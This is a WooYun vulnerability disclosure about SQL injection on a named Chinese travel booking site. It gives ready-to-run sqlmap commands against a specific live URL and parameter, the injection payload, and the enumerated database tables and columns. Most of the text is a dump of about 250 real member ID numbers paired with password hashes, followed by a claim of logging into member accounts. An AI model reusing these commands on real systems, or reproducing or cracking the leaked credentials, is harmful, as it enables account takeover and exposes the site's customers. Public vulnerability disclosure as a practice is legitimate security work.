当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154667

漏洞标题:易联假期旅行网存在SQL注入,导致会员信息泄露

相关厂商:易联假期旅行网

漏洞作者: 终于乌云了

提交时间:2015-11-23 19:51

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

易联假期旅行网存在SQL注入,导致会员信息泄露和会员积分盗取

详细说明:

漏洞测试:Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196”

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=15196 AND 2705=2705
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---

漏洞证明:

猜解出表格
Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” –tables

[5 tables]
+-------+
| group |
| order |
| user |
| hotel |
| room |
+-------+


对user的列名进行猜解
Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” –T user –columns

Table: user
[10 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| address | non-numeric |
| age | non-numeric |
| cardid | numeric |
| email | non-numeric |
| groupid | numeric |
| id | numeric |
| name | non-numeric |
| password | non-numeric |
| phone | non-numeric |
| zip | non-numeric |
+----------+-------------+


通过工具跑出部分user的部分数据:

1.jpg


更多数据:

恭喜,该URL可以注入!
数据库类型:Access数据库
提示1: 所有表名已猜解完毕!
提示2: 所有列名已猜解完毕!
提示2: 所有列名已猜解完毕!
已停止列名猜解!
范围:共有1001条记录!
cardid内容:2
password内容:77804d2ba1922c33
cardid内容:3
password内容:76fe6afa2b5786d8
cardid内容:27
password内容:6ece12c68811f583
cardid内容:30
password内容:0349550c8f24f6a0
cardid内容:38
password内容:0a4303964c42228e
cardid内容:42
password内容:0d99f73951cb976b
cardid内容:45
password内容:7322a4bb7db612af
cardid内容:56
password内容:c9a858eb305e0fd0
cardid内容:205
password内容:f8ded4e9bee409e3
cardid内容:345
password内容:6fc975aa09627918
cardid内容:583
password内容:0beee9022b252152
cardid内容:678
password内容:2c0d5ba7aafad928
cardid内容:755
password内容:dfcadd60576e9364
cardid内容:756
password内容:a237a5508d3477c0
cardid内容:763
password内容:404ad0a3bd4558d0
cardid内容:1025
password内容:4a25ee7029e3a394
cardid内容:1027
password内容:b4d22a7add958f2d
cardid内容:1059
password内容:38dbe374195d41c0
cardid内容:1075
password内容:582fc240dd2674a7
cardid内容:1105
password内容:8726c758afd5a019
cardid内容:1109
password内容:65ae4cf87d02c8b6
cardid内容:1115
password内容:d82b1d6b0e7a2047
cardid内容:1116
password内容:511e46ee0313aa15
cardid内容:1123
password内容:996fa8d3166317d8
cardid内容:1126
password内容:306136be72bbec21
cardid内容:1128
password内容:02258595bfc6799b
cardid内容:1131
password内容:a01da59504cd6b4c
cardid内容:1136
password内容:16260774f4a5ea20
cardid内容:1141
password内容:0abc5e3b72dad57e
cardid内容:1143
password内容:a8c03af5d8cc52a2
cardid内容:1146
password内容:7ed4509e699831f2
cardid内容:1150
password内容:2f877394accb0ab5
cardid内容:1158
password内容:eedbbb2aaf85e879
cardid内容:1166
password内容:c78b03377d94ef73
cardid内容:1169
password内容:49ba59abbe56e057
cardid内容:1172
password内容:c92f93f988ec98f1
cardid内容:1177
password内容:b6b0596c89958861
cardid内容:1178
password内容:68136d4e2321160a
cardid内容:1183
password内容:187b62d14b9eb6c3
cardid内容:1187
password内容:a898337ee043b43d
cardid内容:1190
password内容:1b1adea23c7ba3aa
cardid内容:1200
password内容:08a6b3799a3d9c72
cardid内容:1201
password内容:da87ac39d782741c
cardid内容:1222
password内容:c58c092fb14aa0ae
cardid内容:1237
password内容:7412b5da7be0cf42
cardid内容:1239
password内容:a44a0e34e200a9ca
cardid内容:1259
password内容:0fb1704ae09709c7
cardid内容:1276
password内容:965eb72c92a549dd
cardid内容:1277
password内容:e9fa85325fdda277
cardid内容:1315
password内容:5d4585fba82e7ad6
cardid内容:1318
password内容:58fb408f40652fcf
cardid内容:1319
password内容:61fb35dbccf4250f
cardid内容:1322
password内容:96ef568f6b6dd976
cardid内容:1323
password内容:2301471f071ab51b
cardid内容:1331
password内容:af4edf56835b0de3
cardid内容:1333
password内容:5e8085b3ffb9e6bc
cardid内容:1335
password内容:8420d779506797ae
cardid内容:1339
password内容:c831b04de153469d
cardid内容:1343
password内容:020def1e169895f2
cardid内容:1346
password内容:a77325c90d261ecc
cardid内容:1351
password内容:b385d7aaba4c3319
cardid内容:1355
password内容:243979bbcca6458c
cardid内容:1362
password内容:c831b04de153469d
cardid内容:1363
password内容:699d9acfb37432a1
cardid内容:1367
password内容:c2e8b9f86b2b44a8
cardid内容:1373
password内容:1484d216ea4f6992
cardid内容:1380
password内容:f2d731fbf8ee0ad3
cardid内容:1381
password内容:1be5cb12e9de66b8
cardid内容:1500
password内容:4430431812f52c60
cardid内容:1506
password内容:8726c758afd5a019
cardid内容:1509
password内容:642e728e0afc9ebb
cardid内容:1511
password内容:0bea80da13eaafe6
cardid内容:1515
password内容:c7985b55a15a064d
cardid内容:1516
password内容:8e0b12a7d09ebb0d
cardid内容:1521
password内容:1fcb4197b13dc703
cardid内容:1525
password内容:5ff82d8e4c374cd8
cardid内容:1528
password内容:54f00bd0c3885046
cardid内容:1536
password内容:1ca161bd0d58079d
cardid内容:1539
password内容:cf3f07aadf2943cf
cardid内容:1555
password内容:61b63625eab8e04f
cardid内容:1556
password内容:30bbce89226ea245
cardid内容:1561
password内容:184aa8efa27c903e
cardid内容:1571
password内容:711ef1d811175e86
cardid内容:1572
password内容:a0ba0ffe3b078048
cardid内容:1577
password内容:2a641d4612be929e
cardid内容:1578
password内容:7cfbe645d359a952
cardid内容:1582
password内容:ca1b998becac9e8e
cardid内容:1585
password内容:a10b4324edf717d7
cardid内容:1597
password内容:e782bac5c684ee0b
cardid内容:1598
password内容:a8adef2469f3ee2a
cardid内容:1599
password内容:259277e14e1bf6ef
cardid内容:1672
password内容:2b4567463ffaade7
cardid内容:1682
password内容:903e1b05fdc8bbc8
cardid内容:1699
password内容:e5dd1ca5e114e141
cardid内容:1808
password内容:5e0abe00146e3b3b
cardid内容:1815
password内容:8cf5556c77d39bc8
cardid内容:1816
password内容:11402592ccdaa291
cardid内容:1817
password内容:65b72aeb2aacfecb
cardid内容:1818
password内容:c8129a189e121167
cardid内容:1819
password内容:2e000d4f9919bd70
cardid内容:1830
password内容:c0890f09631257da
cardid内容:1840
password内容:7c68f2fd575959dc
cardid内容:1841
password内容:8732da05928c3d37
cardid内容:1842
password内容:fa0d3cd8ec84a91a
cardid内容:1845
password内容:68216395c9a2e0e0
cardid内容:1846
password内容:98f46fe10ff2966b
cardid内容:1848
password内容:f46a022ae53e5076
cardid内容:1850
password内容:4daef6e95e7a90e8
cardid内容:1853
password内容:4caaf4e6ff3a1447
cardid内容:1855
password内容:3120da587687eb36
cardid内容:1860
password内容:8937967842b4dc81
cardid内容:1872
password内容:9407a430d1f50e80
cardid内容:1877
password内容:62d4732e8f27f67c
cardid内容:1883
password内容:776aae51768dec8f
cardid内容:1885
password内容:c583444ba6045cd1
cardid内容:1888
password内容:13fbab8dc8353d62
cardid内容:1889
password内容:6b6881c370e3992b
cardid内容:1909
password内容:528e6e59aa3584c2
cardid内容:1912
password内容:7e5b5968ec213e41
cardid内容:1960
password内容:1afefeea63b805dd
cardid内容:2104
password内容:304a25071085d8c7
cardid内容:2106
password内容:63b27ec106195c96
cardid内容:2111
password内容:49282c5c77b73614
cardid内容:2118
password内容:99df8a0ba671e2ae
cardid内容:2188
password内容:14ff3279b8a7ed7a
cardid内容:2219
password内容:f95470081bf6cc03
cardid内容:2229
password内容:cbcb69c63a629611
cardid内容:2232
password内容:8bd8956e8c38bc42
cardid内容:2238
password内容:54c5590b04df411b
cardid内容:2243
password内容:a60d0bc938f9af32
cardid内容:2258
password内容:5f6ce7b83b990904
cardid内容:2265
password内容:21d5f24fbe2771c2
cardid内容:2267
password内容:8fae8810eb21e6c5
cardid内容:2288
password内容:d87a736f87910399
cardid内容:2301
password内容:164a3bb649eb5f7e
cardid内容:2327
password内容:fa529d7273da0db6
cardid内容:2360
password内容:410940b0c120ab8e
cardid内容:2367
password内容:8a31a6a26ea0e142
cardid内容:2382
password内容:a9bce24e156d6724
cardid内容:2387
password内容:faaf9f1920d51e7d
cardid内容:2396
password内容:b8e75542c08d9db7
cardid内容:2397
password内容:3f61b0e681241975
cardid内容:2399
password内容:0dc7d353b9b81ce4
cardid内容:2405
password内容:23053e691712a171
cardid内容:2410
password内容:fb4a69ccf869c4d9
cardid内容:2415
password内容:d29bf3b7b91b3a6e
cardid内容:2417
password内容:7d373ca58e9bada0
cardid内容:2545
password内容:99eb1bb596f617da
cardid内容:2651
password内容:9ed11bdd33f01ca6
cardid内容:2653
password内容:5b279647579b75a3
cardid内容:2680
password内容:445c833caaad5ea0
cardid内容:2705
password内容:5e3c717072b35d00
cardid内容:2753
password内容:611602a90fa866a2
cardid内容:2877
password内容:41e9c312f9db2ac0
cardid内容:2899
password内容:2b2c5380e3d86b0f
cardid内容:2988
password内容:7c4511dcdfc7b021
cardid内容:2999
password内容:1076228db9e8ecd4
cardid内容:3100
password内容:464c0063036d3cc1
cardid内容:3171
password内容:116aa257b9bd2c46
cardid内容:3177
password内容:2a4ca0714003dc11
cardid内容:3195
password内容:47d37ba24e562db4
cardid内容:3223
password内容:672d7f27e545fd23
cardid内容:3229
password内容:3679aaa93980d9e9
cardid内容:3235
password内容:68db799d51ecae84
cardid内容:3251
password内容:0633b88d6e8b8dad
cardid内容:3253
password内容:79c8cbdbbb0f3239
cardid内容:3255
password内容:b2c2f7a4fde64b51
cardid内容:3257
password内容:d7a84a9b5c2405f2
cardid内容:5005
password内容:14e8c343b98ac7ed
cardid内容:5011
password内容:ffea9ff0fed12666
cardid内容:5026
password内容:c0776caddd2afd2f
cardid内容:5032
password内容:a10ffecef011330a
cardid内容:5033
password内容:792fa2f9cb596e46
cardid内容:5057
password内容:f64264859dfa00f3
cardid内容:5101
password内容:df3748ac9b6d57a5
cardid内容:5107
password内容:080e51e9367fa69d
cardid内容:5115
password内容:120afb2b93f4f99e
cardid内容:5117
password内容:52d04dc20036dbd8
cardid内容:5128
password内容:0e766d2b613fe11a
cardid内容:5155
password内容:dfa87db18ce10732
cardid内容:5160
password内容:974d217e8fa22a87
cardid内容:5165
password内容:f361fa5aab37e50c
cardid内容:5187
password内容:f6e5ba6cc8c8b1ea
cardid内容:5196
password内容:e0a766df71533140
cardid内容:5262
password内容:74798e3c4dd02bc4
cardid内容:5350
password内容:2ac330a7455809c6
cardid内容:5359
password内容:f007db7a235d7020
cardid内容:5447
password内容:cb8d2ffd28b0c04c
cardid内容:5461
password内容:e8d62d2715d27f46
cardid内容:5467
password内容:04b84832ba173f39
cardid内容:5468
password内容:9eb774de14020b4d
cardid内容:5473
password内容:18da6acf0e2a6a93
cardid内容:5480
password内容:2bef02a23c624483
cardid内容:5486
password内容:53f50ee875273e4c
cardid内容:5491
password内容:058199aa4dbff447
cardid内容:5495
password内容:0829c0639ddd8853
cardid内容:5505
password内容:27d7fe15a4bbf275
cardid内容:5510
password内容:11e3545a0dedcbb2
cardid内容:5512
password内容:2e5a3e99fbe3d2d6
cardid内容:5515
password内容:e766276fee0f229a
cardid内容:5525
password内容:78032da583f74960
cardid内容:5527
password内容:fd927059742ef6ad
cardid内容:5533
password内容:de91f97d8ef36bf4
cardid内容:5541
password内容:8c731c870e97170f
cardid内容:5546
password内容:39b2c80682e113d8
cardid内容:5547
password内容:21cc5e8f5c5c607f
cardid内容:5553
password内容:8df3080435e4ef10
cardid内容:5556
password内容:81c1505d8a769530
cardid内容:5560
password内容:0c5e6aa64b074f0b
cardid内容:5563
password内容:1ace8b346daaa1b1
cardid内容:5567
password内容:9aac4b898d947959
cardid内容:5571
password内容:61f80af78e9775b7
cardid内容:5590
password内容:f0d2c7859462abff
cardid内容:5601
password内容:1c6a823df321a7b2
cardid内容:5603
password内容:95fb8590b83ce5f9
cardid内容:5640
password内容:8e9de04a575fc437
cardid内容:5641
password内容:0d481bc12912324a
cardid内容:5650
password内容:a8b5a3a89d68f74c
cardid内容:5661
password内容:ff6e26420fa28914
cardid内容:5668
password内容:c452ba8906a5fa65
cardid内容:5735
password内容:ecfd8cbb5fd2fcfb
cardid内容:6357
password内容:df9f8559140cc48e
cardid内容:6363
password内容:a1881125e655c8c9
cardid内容:6365
password内容:edc8c78d1ca783de
cardid内容:6386
password内容:2c75b23dc963c7eb
cardid内容:6392
password内容:920081b616cf591d
cardid内容:6393


尝试登陆会员:

2.jpg


3.jpg


4.jpg


5.jpg

修复方案:

输入过滤或编码。

版权声明:转载请注明来源 终于乌云了@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝